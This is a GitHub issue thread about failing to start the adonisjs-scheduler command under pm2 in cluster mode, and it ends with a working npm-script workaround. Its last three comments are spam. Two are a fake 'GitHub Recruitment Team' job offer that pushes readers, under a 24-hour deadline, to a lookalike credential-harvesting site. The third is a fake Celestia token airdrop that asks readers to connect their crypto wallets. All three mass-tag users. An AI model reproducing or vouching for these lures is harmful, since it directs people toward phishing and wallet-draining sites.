### ISSUE TITLE
Cannot start in production using pm2

### ISSUE THREAD

**Issue by zecar** [KABBOUCHI/adonisjs-scheduler#5]
I have the following ecosystem.config.cjs

```js
module.exports = {
  apps: [
    {
      name: 'spins-scheduler-dev',
      script: 'ace scheduler:run',
      instances: 'max',
      exec_mode: 'cluster',
      autorestart: true,
      env: {
        ENV_PATH: '/var/github-actions/built-files/spins-api-dev/env-files/dev',
      },
    },
  ],
}

```

if I go into pm2 logs, I get this error, on loop

```
9|spins-scheduler-dev  | /usr/bin/bash:1
9|spins-scheduler-dev  | ELF
9|spins-scheduler-dev  | ^
9|spins-scheduler-dev  | SyntaxError: Invalid or unexpected token
9|spins-scheduler-dev  |     at internalCompileFunction (node:internal/vm:77:18)
9|spins-scheduler-dev  |     at wrapSafe (node:internal/modules/cjs/loader:1290:20)
9|spins-scheduler-dev  |     at Module._compile (node:internal/modules/cjs/loader:1342:27)
9|spins-scheduler-dev  |     at Module._extensions..js (node:internal/modules/cjs/loader:1437:10)
9|spins-scheduler-dev  |     at Module.load (node:internal/modules/cjs/loader:1212:32)
9|spins-scheduler-dev  |     at Module._load (node:internal/modules/cjs/loader:1028:12)
9|spins-scheduler-dev  |     at /usr/local/lib/node_modules/pm2/lib/ProcessContainer.js:304:25
9|spins-scheduler-dev  |     at wrapper (/usr/local/lib/node_modules/pm2/node_modules/async/internal/once.js:12:16)
9|spins-scheduler-dev  |     at next (/usr/local/lib/node_modules/pm2/node_modules/async/waterfall.js:96:20)
9|spins-scheduler-dev  |     at /usr/local/lib/node_modules/pm2/node_modules/async/internal/onlyOnce.js:12:16
```

app is started by 
`pm2 start ecosystem.config.cjs --only "spins-scheduler-dev"`

adonis v6
node v21.6.1

**Comment by KABBOUCHI** [comment]
@zecar works for me

![image](https://github.com/KABBOUCHI/adonisjs-scheduler/assets/9212274/87804aee-57d6-44f3-a3ff-1c3da30af2ba)

check where that exist? 
![image](https://github.com/KABBOUCHI/adonisjs-scheduler/assets/9212274/0d08a35e-52d2-4626-a359-59c41abdda19)


also why u spawning a cluster, shouldn't u have a 1 instance for scheduler/cron?

**Comment by zecar** [comment]
imma be honest with you, I have no idea if i should have a cluster or single instance for scheduler :/

also, that does not exist anywhere, i don't know what that is.

I made it work by making a npm command to run the scheduler and call that command via pm2

Also, can you make sure you are starting the app via pm2 config file instead of cli?

**Comment by KABBOUCHI** [comment]
@zecar plz try with single instance (works for me), will check cluster mode tmrw

```cjs
// ecosystem.config.cjs
module.exports = {
  apps: [
    {
      name: 'spins-scheduler-dev',
      script: 'node ace scheduler:run',
      autorestart: true,
    },
  ],
}
```

**Comment by zecar** [comment]
@KABBOUCHI made it work with

```
{
      name: 'spins-scheduler-dev',
      script: '/usr/bin/npm',
      args: 'run start-scheduler',
      autorestart: true,
      env: {
        ENV_PATH: '/var/github-actions/built-files/spins-api-dev/env-files/dev',
      },
    },
```

**Comment by Ripon9898** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
dshulyak, @vvkio, @peebeejay, @Echolinq, @QuantNymph, @0xwagyu, @0xAtharva, @ysnbogt, @omasanori, @pyk, @hjawhar, @KaoImin, @Rizary, @gnewby, @sbtobb, @blacktoast, @bt3gl, @0xKarl98, @Kim8584, @Majchrzak

**Comment by thangtq-pionero** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
xianz271828, @GalaIO, @wnyao, @nigdaemon, @mnuestc, @andrii-kl, @HilliamT, @natotatoetoy, @3for, @Iceapinan, @sabedevops, @vijethx, @AuroraLantean, @iKausik, @zkSoju, @BlackTrace, @anyshy, @0xlax, @0xvv, @yahengsu

**Comment by zhouxing5311** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://celestia.eigenllayer.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://celestia.eigenllayer.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!spachava753, @nguyendoanhien, @AbdelStark, @jley81, @Sosky-Hwang, @PumpkinSin, @Kampe, @nfnty, @myiwen, @JasoonS, @somerb, @TennisBowling, @ragnarok56, @dontdebugmebro, @AntoBrajkovic, @KABBOUCHI, @cryptomental, @YourLUSTGod, @dtr0x, @AkiaCode
